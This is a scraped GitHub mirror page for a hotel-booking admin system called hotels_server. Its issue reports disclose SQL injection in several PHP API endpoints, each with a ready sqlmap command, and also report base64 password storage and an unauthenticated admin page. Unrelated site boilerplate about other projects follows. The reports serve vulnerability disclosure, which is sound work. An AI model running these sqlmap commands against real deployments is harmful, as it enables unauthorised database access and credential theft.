fantasticlbp / hotels_server Goto Github PK
View Code? Open in Web Editor NEW酒店预订系统后台管理系统
酒店预订系统后台管理系统
the parameter was added with a string "username=" ,passed to function find
In the definition of function find,we can notice that though the author use PDO, he didn't use Prepared technique to avoid SQL injection vulnerability. What a pity!
After analyzing these codes,we can simply use sqlmap to exploit the vulnerability and have fun!
SQL Injection exists /controller/api/RevokeOrder.php
sqlmap -u "http://10.211.55.10/controller/api/RevokeOrder.php?key=TheHotelReversationApplication&city=1&orderId=1"
author:[email protected]
SQL Injection exists : /controller/api/orderList.php
sqlmap -u "http://10.211.55.10/controller/api/orderList.php?telephone=1&request=1"
author:[email protected]
SQL Injection exists /controller/api/Room.php hotelId
sqlmap -u "http://10.211.55.10/controller/api/Room.php?key=TheHotelReversationApplication&hotelId=1"
author:[email protected]
url /controller/api/Order.php exist SQL Injection
sqlmap -u "http://10.211.55.10/controller/api/Order.php?telephone=1&key=TheHotelReversationApplication&request=1"
author: [email protected]
How can i translate to english
exists sql inject in /controller/api/RandomHotel.php
sqlmap -u "http://10.211.55.10/controller/api/RandomHotel.php?key=TheHotelReversationApplication&city=1"
author:[email protected]
The application uses B64 encoding for storage of password
Obscuring a password with a trivial encoding does not protect the password.
https://cwe.mitre.org/data/definitions/261.html
https://paragonie.com/blog/2015/08/you-wouldnt-base64-a-password-cryptography-decoded
In /controller/fetchpwd.php
It will receive a parameter called "username" to search for existed users.
But in fact,this parameter just become a part of the SQL request without any process,so it will be possible to have a SQL injection.
We can use SQLMAP to test this vulnerability:
sqlmap -u "http://192.168.31.91/controller/fetchpwd.php" --data "username=1" --dbms mysql -p username
GET parameter 'password' appears to be 'MySQL <= 5.0.11 AND time-based blind (heavy query)' injectable
PATH: http://localhost/Hotels_Server/controller/inscheck.php
Poc
.
/view/hotelList.php Unauthorized Access Vulnerability
code:
No user authentication code
visit link :http://host/view/hotelList.php Can view background data
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.